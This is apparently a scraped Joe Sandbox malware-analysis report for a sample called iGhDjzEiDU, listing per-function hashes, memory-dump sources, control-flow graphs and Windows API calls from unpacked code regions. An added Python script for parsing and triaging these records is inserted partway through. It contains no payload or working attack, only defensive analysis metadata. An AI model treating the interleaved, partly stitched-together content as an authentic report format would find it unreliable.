• Opcode ID: e1b0adca627bbe76ac7de5a34a51e4e28150ef1439146c8596f15d2eb29decae
• Instruction ID: b1cb46f0f9076f9ae70059ca4be62310592f8698a4c43cfbf9e26f44e8b38152
• Opcode Fuzzy Hash: e1b0adca627bbe76ac7de5a34a51e4e28150ef1439146c8596f15d2eb29decae
• Instruction Fuzzy Hash: 97425AB0B002159FDB04DF68C884BAD77F2BF85314F2585A9E445EB3A1DB34AD46CBA1
Memory Dump Source
• Source File: 00000000.00000002.1700659197.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5520000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 74854747533089bdf7537a1dc438f0604707d1f416417d61e3d83f435e79a94b
                                                                                                                                                                                                                                            • Instruction ID: 9a491c1689065e998e84a04da53caa64aeef085184d03569137fc0a43fffbdf6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 74854747533089bdf7537a1dc438f0604707d1f416417d61e3d83f435e79a94b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 29526B34A003168FCB14DF68C844B98B7F2FF89314F2586A9D5586F3A1DB71A986CF81
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1700659197.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5520000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: d756410edb857cc40a58885d09de61103ae137fac2f692750ecbeb4c457ba27d
                                                                                                                                                                                                                                            • Instruction ID: 92cec1e2a3ff7deb9d27c6a99b53343fb306ca213ca7ffac93800cfb79da2ec2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d756410edb857cc40a58885d09de61103ae137fac2f692750ecbeb4c457ba27d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 65525A34A003568FCB14DF68C844B98B7F2FF85314F2586A9D5586F3A1DB71AA86CF80
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 5bd740297c334d376159e336dc0d3ce9910178fc3f59fa4f243e80a57674ae96
                                                                                                                                                                                                                                            • Instruction ID: 8c683708d617e3cac0e01beb56afee47d4b1f71c00517a98b534fb6537b3cb7a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5bd740297c334d376159e336dc0d3ce9910178fc3f59fa4f243e80a57674ae96
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7812A675D0061ACFCB15DF68C880AD9F7B1FF99300F1586AAD859A7211EB70AAC5CF90
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: e474d3d6c529ac49473ad96731bc35684e3302b4a02729b80d1e51fd4a8dd42b
                                                                                                                                                                                                                                            • Instruction ID: a012a71cb9b3d292a4858e3bd920375c9246c67b6fd42542ba54c3bba685e4a5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e474d3d6c529ac49473ad96731bc35684e3302b4a02729b80d1e51fd4a8dd42b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2412B675D0061ACFCB15DF68C880AD9F7B1FF99304F1586AAD859A7211EB70AAC4CF90
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1715142645.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7990000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 72314d1161c8bca3aaee79468ffa495f69e26506525fe0a6ab925e0f8a37f753
                                                                                                                                                                                                                                            • Instruction ID: dcbb065a600d14baec10db7ab3f4c7595877af3bee3ffdc18a699615cad45343
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 72314d1161c8bca3aaee79468ffa495f69e26506525fe0a6ab925e0f8a37f753
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46D16CB5E00219DFEF15CFA9C88079DBBB2BF88314F1485B9D409AB255EB34D985CB90

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 513 132e080-132e10f GetCurrentProcess 517 132e111-132e117 513->517 518 132e118-132e14c GetCurrentThread 513->518 517->518 519 132e155-132e189 GetCurrentProcess 518->519 520 132e14e-132e154 518->520 522 132e192-132e1aa 519->522 523 132e18b-132e191 519->523 520->519 526 132e1b3-132e1e2 GetCurrentThreadId 522->526 523->522 527 132e1e4-132e1ea 526->527 528 132e1eb-132e24d 526->528 527->528
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0132E0FE
                                                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 0132E13B
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0132E178
                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0132E1D1
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1680898199.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1320000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2063062207-0
                                                                                                                                                                                                                                            • Opcode ID: 4f6a4e308b3520755c9100cba20037b3055a0231d17c76aee9e1911ee49b7f53
                                                                                                                                                                                                                                            • Instruction ID: d4e510f1ffb0ef84c910ed71b79ed057578c693a1dcaca1f1085ef7c5c396084
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f6a4e308b3520755c9100cba20037b3055a0231d17c76aee9e1911ee49b7f53
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B15148B09012098FDB18DFAAD949BEEBFF1EF88314F24C469E409A7350D7346944CB65
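Reading hundreds of these per-function records by eye is slow, and the useful triage facts (which memory regions the recovered code lives in, which Win32 APIs each region calls, whether the region was recovered as a PE image) are spread across many fields. The Python below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses records in exactly the layout shown above (the embedded SAMPLE is a constructed excerpt copying two records from this page), orders each function's API references by address so they read the way the control-flow graph does, groups functions by .sdmp dump, and cross-checks that the fourth dotted field of the dump name equals the Offset printed on the record. That one field decoding is the only assumption made about the dump-name format; the remaining dotted fields are left undecoded.

```python
import re
from collections import defaultdict

# Constructed excerpt in the report's own layout: two records copied from the
# page above (one with an APIs list, one with a String ID), nothing else.
SAMPLE = """\
APIs
• GetCurrentProcess.KERNEL32 ref: 0132E0FE
• GetCurrentThread.KERNEL32 ref: 0132E13B
• GetCurrentProcess.KERNEL32 ref: 0132E178
• GetCurrentThreadId.KERNEL32 ref: 0132E1D1
Memory Dump Source
• Source File: 00000000.00000002.1680898199.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1320000_iGhDjzEiDU.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 4f6a4e308b3520755c9100cba20037b3055a0231d17c76aee9e1911ee49b7f53
• Instruction ID: d4e510f1ffb0ef84c910ed71b79ed057578c693a1dcaca1f1085ef7c5c396084
• Opcode Fuzzy Hash: 4f6a4e308b3520755c9100cba20037b3055a0231d17c76aee9e1911ee49b7f53
• Instruction Fuzzy Hash: B15148B09012098FDB18DFAAD949BEEBFF1EF88314F24C469E409A7350D7346944CB65
Strings
Memory Dump Source
• Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
Similarity
• API ID:
• String ID: Hhq$$dq$$dq$$dq
• API String ID: 0-1693755344
• Opcode ID: bc9356ada8485ac5e7e6afd751ca58d3fe994f5afb62aa6a4c31b736f5f58158
• Instruction ID: 37f365ae75dedf4fbdc82dae407a78ef803a3e9a4ca4afc0585f31aa681f1a4f
• Opcode Fuzzy Hash: bc9356ada8485ac5e7e6afd751ca58d3fe994f5afb62aa6a4c31b736f5f58158
• Instruction Fuzzy Hash: 1EA1D2B0700706CFDB24DE74C8907AA73A7AF85318F2489AAD815EB291DB75D883CB51
"""

API_RE = re.compile(r"^• (\w+)\.(\w+) ref: ([0-9A-Fa-f]+)$")
SOURCE_RE = re.compile(r"^• Source File: (\S+), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)$")
FIELD_RE = re.compile(r"^• ([^:]+): ?(.*)$")


def _new_record():
    return {"dump": None, "offset": None, "based_on_pe": None, "apis": [], "fields": {}}


def parse_records(text):
    """One dict per function. A record ends at its 'Instruction Fuzzy Hash' line,
    the last field the report prints for a function; the 'APIs' and 'Strings'
    lines that precede 'Memory Dump Source' belong to that same record."""
    records, cur = [], _new_record()
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = API_RE.match(line)        # "• GetCurrentProcess.KERNEL32 ref: 0132E0FE"
        if m:
            cur["apis"].append((m.group(1), m.group(2), int(m.group(3), 16)))
            continue
        m = SOURCE_RE.match(line)     # dump name, region offset, PE-reconstruction flag
        if m:
            cur["dump"] = m.group(1)
            cur["offset"] = int(m.group(2), 16)
            cur["based_on_pe"] = m.group(3) == "true"
            continue
        m = FIELD_RE.match(line)      # any other "• Key: value" field
        if m:
            key, value = m.group(1).strip(), m.group(2).strip()
            cur["fields"][key] = value
            if key == "Instruction Fuzzy Hash":
                records.append(cur)
                cur = _new_record()
    return records


def api_sequence(record):
    """API references ordered by address, i.e. in the order they sit along the function."""
    return sorted(record["apis"], key=lambda call: call[2])


def dump_base_address(dump_name):
    """Base address encoded in the dotted .sdmp name. Assumption used here: the fourth
    dotted field is the region base; it equals the 'Offset' printed on the same record
    (01320000 and 07970000 above). The other dotted fields are not decoded."""
    return int(dump_name.split(".")[3], 16)


def summarize(records):
    """Group functions by dump: count, APIs referenced, String IDs seen, the
    'based on PE' flag, and whether every Offset agrees with the dump-name base."""
    summary = defaultdict(lambda: {"functions": 0, "apis": set(), "strings": set(),
                                   "based_on_pe": None, "offset_consistent": True})
    for rec in records:
        entry = summary[rec["dump"]]
        entry["functions"] += 1
        entry["apis"].update(f"{name}.{module}" for name, module, _ in rec["apis"])
        entry["based_on_pe"] = rec["based_on_pe"]
        if rec["fields"].get("String ID"):
            entry["strings"].add(rec["fields"]["String ID"])
        if dump_base_address(rec["dump"]) != rec["offset"]:
            entry["offset_consistent"] = False
    return dict(summary)


if __name__ == "__main__":
    for dump, info in summarize(parse_records(SAMPLE)).items():
        print(dump, info)
```

Run against a full report export, the summary separates the image-backed code from regions such as 01320000, 05520000 and 07970000 here, all marked "based on PE: false", which is where unpacked or injected code that never existed as a file on disk shows up; the API set per region is then a quick way to decide which dump to open in IDA first.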

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 534 797fa7c-797fa83 535 797fa85-797fa95 534->535 536 797fa0e call 797de74 534->536 538 797fd23-797fd61 535->538 539 797fa9b-797faac call 7975630 535->539 540 797fa13-797fa16 536->540 569 797fcf9-797fd03 538->569 573 797fd63-797fd75 538->573 544 797fab2-797fabb call 7975798 539->544 545 797fca9-797fcad 539->545 553 797fad3-797fadb 544->553 554 797fabd-797fac3 544->554 548 797fcaf-797fcc1 545->548 549 797fcc9-797fcdb 545->549 548->549 556 797fcdd-797fce3 549->556 557 797fce9-797fced 549->557 560 797fae2-797fae5 553->560 561 797fadd-797fae0 553->561 558 797fac7-797fac9 554->558 559 797fac5 554->559 562 797fce7 556->562 563 797fce5 556->563 565 797fcef-797fcf7 557->565 566 797fd1b-797fd22 557->566 558->553 559->553 567 797fae8-797faf2 560->567 561->567 562->557 563->557 565->569 575 797faf4-797fafa 567->575 576 797fb00-797fb02 567->576 569->566 571 797fd05-797fd0c 569->571 571->566 574 797fd0e-797fd16 571->574 578 797fd77-797fd7c 573->578 579 797fdcc-797fdd4 573->579 574->566 580 797fafe 575->580 581 797fafc 575->581 576->545 577 797fb08-797fb11 call 7975798 576->577 587 797fb13-797fb19 577->587 588 797fb29-797fb31 577->588 578->579 583 797fd7e-797fd87 call 7976850 578->583 585 797fddc-797fddf 579->585 580->576 581->576 583->579 592 797fd89-797fd8d 583->592 590 797fb1d-797fb1f 587->590 591 797fb1b 587->591 593 797fb33-797fb36 588->593 594 797fb38-797fb3b 588->594 590->588 591->588 592->579 595 797fd8f-797fda2 call 7976850 592->595 596 797fb3e-797fb48 593->596 594->596 600 797fda4-797fda6 595->600 601 797fda8-797fdb9 595->601 602 797fb60-797fb7c call 7975548 596->602 603 797fb4a-797fb50 596->603 607 797fdbf-797fdc1 600->607 601->607 602->545 614 797fb82-797fba4 602->614 604 797fb54-797fb56 603->604 605 797fb52 603->605 
604->602 605->602 607->579 608 797fdc3-797fdca 607->608 608->579 611 797fde0-797fe49 608->611 636 797fe50-797fe8f 611->636 637 797fe4b 611->637 617 797fba6-797fbbb call 797de64 614->617 618 797fbfb-797fc0c 614->618 626 797fbd5 617->626 627 797fbbd-797fbc1 617->627 623 797fc26 618->623 624 797fc0e-797fc24 618->624 629 797fc2b-797fc3a 623->629 624->629 628 797fbd7-797fbd9 626->628 627->626 630 797fbc3-797fbc7 627->630 628->618 633 797fbdb-797fbf6 call 7971228 628->633 634 797fc3c-797fc44 call 79766bc 629->634 635 797fc49-797fc4d 629->635 630->626 632 797fbc9-797fbd3 630->632 632->628 633->618 634->635 635->545 640 797fc4f-797fc72 call 79766cc 635->640 643 797fe96-797ff40 636->643 644 797fe91 636->644 637->636 646 797fc74-797fc8d call 79766cc 640->646 647 797fc92-797fc99 640->647 649 797ff47-797ff73 643->649 650 797ff42 643->650 644->643 646->647 647->545 651 797fc9b-797fca4 call 79766bc 647->651 657 797ff33-797ff34 649->657 650->649 651->545 658 797feb3-797feb7 657->658 659 797feeb-797fef5 658->659 660 797feb9-797fed1 658->660 661 797fef7 659->661 662 797fefc-797ff14 659->662 666 797fe77-797fe7c 660->666 667 797fed3-797fed4 660->667 661->662 663 797ff16-797ff23 662->663 664 797ff2d-797ff31 662->664 672 797fee5-797ff8a 663->672 664->657 664->658 666->663 669 797fe82-797fe83 666->669 667->666 669->663
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
Similarity
• API ID:
• String ID: Hhq$$dq$$dq$$dq
• API String ID: 0-1693755344
• Opcode ID: bc9356ada8485ac5e7e6afd751ca58d3fe994f5afb62aa6a4c31b736f5f58158
• Instruction ID: 37f365ae75dedf4fbdc82dae407a78ef803a3e9a4ca4afc0585f31aa681f1a4f
• Opcode Fuzzy Hash: bc9356ada8485ac5e7e6afd751ca58d3fe994f5afb62aa6a4c31b736f5f58158
• Instruction Fuzzy Hash: 1EA1D2B0700706CFDB24DE74C8907AA73A7AF85318F2489AAD815EB291DB75D883CB51

Control-flow Graph
control_flow_graph 793 79932f8-799331d call 7991f64 796 799331f-799332f 793->796 797 7993332-79933c4 CreateIconFromResourceEx 793->797 801 79933cd-79933ea 797->801 802 79933c6-79933cc 797->802 802->801
Strings
Memory Dump Source
• Source File: 00000000.00000002.1715142645.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7990000_iGhDjzEiDU.jbxd
Similarity
• API ID: CreateFromIconResource
• String ID: o
• API String ID: 3668623891-252678980
• Opcode ID: 82dd72b9729c7cc1b3f99e44b44751a7e8db5c7706397926a35c81b90c80eb60
• Instruction ID: 394e5511cfd3faf7d6507c64054ecb65b1a0e6758ca1e8bb8a5d39686485dcdf
• Opcode Fuzzy Hash: 82dd72b9729c7cc1b3f99e44b44751a7e8db5c7706397926a35c81b90c80eb60
• Instruction Fuzzy Hash: 71318DB19043899FDB11CFAAD800AEEBFF9EF49314F14806AF954A7251C3359854DFA1

Control-flow Graph
control_flow_graph 805 7978b81-7978b8c 806 7978b14-7978b7a 805->806 807 7978b8e-7978bc6 805->807 812 7978bcc-7978bdf call 79767c0 807->812 813 7978f89-7978fb4 807->813 818 7978bf3-7978c19 812->818 819 7978be1-7978beb 812->819 830 7978fbb-797900b 813->830 818->830 831 7978c1f-7978c35 call 79767d0 818->831 819->818 859 797900d-7979021 830->859 860 797902c-7979034 830->860 835 7978d17-7978d1b 831->835 836 7978c3b-7978c55 831->836 838 7978d1d-7978d23 835->838 839 7978d2b-7978d3b call 79767e0 835->839 844 7978c57-7978c65 836->844 845 7978c6d-7978c89 836->845 838->839 846 7978d72-7978dac call 79767f0 call 7975c28 839->846 847 7978d3d-7978d66 839->847 844->845 857 7978ce6-7978d0a 845->857 858 7978c8b-7978c96 845->858 867 7978dc4-7978de0 846->867 868 7978dae-7978dbc 846->868 875 7978d14 857->875 876 7978d0c 857->876 869 7978cae-7978cbf 858->869 870 7978c98-7978c9e 858->870 859->860 884 7978e54-7978e78 867->884 885 7978de2-7978ded 867->885 868->867 880 7978cc6-7978cc9 869->880 881 7978cc1-7978cc4 869->881 873 7978ca2-7978ca4 870->873 874 7978ca0 870->874 873->869 874->869 875->835 876->875 882 7978ccc-7978cd3 880->882 881->882 887 7978cd9-7978ce4 882->887 895 7978e82 884->895 896 7978e7a 884->896 891 7978e05-7978e12 885->891 892 7978def-7978df5 885->892 887->857 887->858 893 7978e26-7978e52 call 79728fc 891->893 894 7978e14-7978e20 891->894 897 7978df7 892->897 898 7978df9-7978dfb 892->898 893->884 893->885 894->893 895->813 896->895 897->891 898->891
Strings
Memory Dump Source
• Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
Similarity
• API ID:
• String ID: PHdq$PHdq
• API String ID: 0-1995607813
• Opcode ID: 3b6e56cb2e1b54842c1c840179c4b322172c25ca725d53ac4b6defc0429ed9f3
• Instruction ID: 7faf995d9ab5562ae1cdd158375c7467b9483d80b791e642237489ec9892da24
• Opcode Fuzzy Hash: 3b6e56cb2e1b54842c1c840179c4b322172c25ca725d53ac4b6defc0429ed9f3
• Instruction Fuzzy Hash: 7FD105B47002158FCB18DF68D598EA9BBF2BF89715B1545A9E406EB3A1CB31EC41CB90
APIs
• CreateActCtxA.KERNEL32(?), ref: 013259C9
Memory Dump Source
• Source File: 00000000.00000002.1680898199.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1320000_iGhDjzEiDU.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: a585e58500bf7aecea40c9502b5be4b7760f75c7a485605911fac2cade846724
• Instruction ID: cffc2447899165f686c8a20c18237b06441432d2db68890040ff1f5962acba4c
• Opcode Fuzzy Hash: a585e58500bf7aecea40c9502b5be4b7760f75c7a485605911fac2cade846724
• Instruction Fuzzy Hash: E741F3B0D00729CBDF24DFAAC985BDDBBB5BF49318F20805AD408AB251DB756A45CF90
APIs
• CreateActCtxA.KERNEL32(?), ref: 013259C9
Memory Dump Source
• Source File: 00000000.00000002.1680898199.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1320000_iGhDjzEiDU.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 634e00a253213d5eb67a9cfb3c2ecf10df0cb5cb1372e32030997395cb041b52
• Instruction ID: 8deaf34349f1ceb23c6a0f6e983b374eedd844a778b3b6bff419cc066cf5e24e
• Opcode Fuzzy Hash: 634e00a253213d5eb67a9cfb3c2ecf10df0cb5cb1372e32030997395cb041b52
• Instruction Fuzzy Hash: 4241D2B0C0071DCBDB24DFA9C985BDEBBB5BF49314F20806AD408AB251DB756945CF90
Memory Dump Source
• Source File: 00000000.00000002.1680898199.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1320000_iGhDjzEiDU.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 108d2abb2f4bb6bd039cb916c925d077edc97c0f7bb778b106f7d112f74d4ae6
• Instruction ID: c098096c6ddd765cfc05a476b14e22cc4dcc9cef06c7c720bf3125ca6ec2494b
• Opcode Fuzzy Hash: 108d2abb2f4bb6bd039cb916c925d077edc97c0f7bb778b106f7d112f74d4ae6
• Instruction Fuzzy Hash: 2331BDB1905368CFDF21EFA8C8457DDBBB1EF56318F24818AC405AB252C735AA46CB41
APIs
• DrawTextExW.USER32(?,?,?,?,?,?), ref: 05527917
Memory Dump Source
• Source File: 00000000.00000002.1700659197.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5520000_iGhDjzEiDU.jbxd
Similarity
• API ID: DrawText
• String ID:
• API String ID: 2175133113-0
• Opcode ID: aa37c3b88d060fe8dc841153504d154a8117a34deb6c303e02d8a6d872c4b93e
• Instruction ID: fd349b46fe6d8786b74b492fd6df771a630a547fa5b80020906a49c455c811ab
• Opcode Fuzzy Hash: aa37c3b88d060fe8dc841153504d154a8117a34deb6c303e02d8a6d872c4b93e
• Instruction Fuzzy Hash: D23146B69002499FCB01CF99D940ADEBBF1FF49320F18805AE919A7361C735A914CF60
APIs
• DrawTextExW.USER32(?,?,?,?,?,?), ref: 05527917
Memory Dump Source
• Source File: 00000000.00000002.1700659197.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5520000_iGhDjzEiDU.jbxd
Similarity
• API ID: DrawText
• String ID:
• API String ID: 2175133113-0
• Opcode ID: 56a40aef82d01b12368049fb2b2fd07019a14d2909c2f443d957c364da79e1ca
• Instruction ID: 1506ad9461ab3b9cfc91ef032d64df93ba9d844470ec10a9735617323a842709
• Opcode Fuzzy Hash: 56a40aef82d01b12368049fb2b2fd07019a14d2909c2f443d957c364da79e1ca
• Instruction Fuzzy Hash: 2A31E2B5D102499FCB10CF9AD880A9EFBF5FB48324F24842AE919A7350D774A944CFA0
APIs
• DrawTextExW.USER32(?,?,?,?,?,?), ref: 05527917
Memory Dump Source
• Source File: 00000000.00000002.1700659197.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5520000_iGhDjzEiDU.jbxd
Similarity
• API ID: DrawText
• String ID:
• API String ID: 2175133113-0
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0132E34F
Memory Dump Source
• Source File: 00000000.00000002.1680898199.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1320000_iGhDjzEiDU.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
APIs
• CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,07993312,?,?,?,?,?), ref: 079933B7
Memory Dump Source
• Source File: 00000000.00000002.1715142645.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7990000_iGhDjzEiDU.jbxd
Similarity
• API ID: CreateFromIconResource
• String ID:
• API String ID: 3668623891-0
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 0132C046
Memory Dump Source
• Source File: 00000000.00000002.1680898199.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1320000_iGhDjzEiDU.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
Similarity
• API ID:
• String ID: Hhq
• API String ID: 0-4210879014
Strings
Memory Dump Source
• Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
Similarity
• API ID:
• String ID: $dq
• API String ID: 0-847773763
Strings
Memory Dump Source
• Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
Similarity
• API ID:
• String ID: $dq
• API String ID: 0-847773763
Memory Dump Source
• Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                                                                                            • Opcode ID: a4d5f0c110330db797b78c5ca3ea525abba293312f69cb8bebefbeeeeeb2e9f0
                                                                                                                                                                                                                                            • Instruction ID: bc6634147a54c807b59a50e9d7c6e05cc15ab943f64624ed5467f1bee289b887
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a4d5f0c110330db797b78c5ca3ea525abba293312f69cb8bebefbeeeeeb2e9f0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4CD160B0600705CFC729DF38C490AAE77B6EF85229F544A6EE0529B3E1DB35E885CB10
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1714629283.0000000007970000.00000040.00000800.00020000.00000000.sdmp, Offset: 07970000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7970000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 132add3e40579a4f142ed371693f39076ef03aa5e95e305d5273e63fd802d312
                                                                                                                                                                                                                                            • Instruction ID: 97717130fde928c08713c3bc56067d3bef5f8f71e76d7b405d132b7fade4fc2f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 132add3e40579a4f142ed371693f39076ef03aa5e95e305d5273e63fd802d312
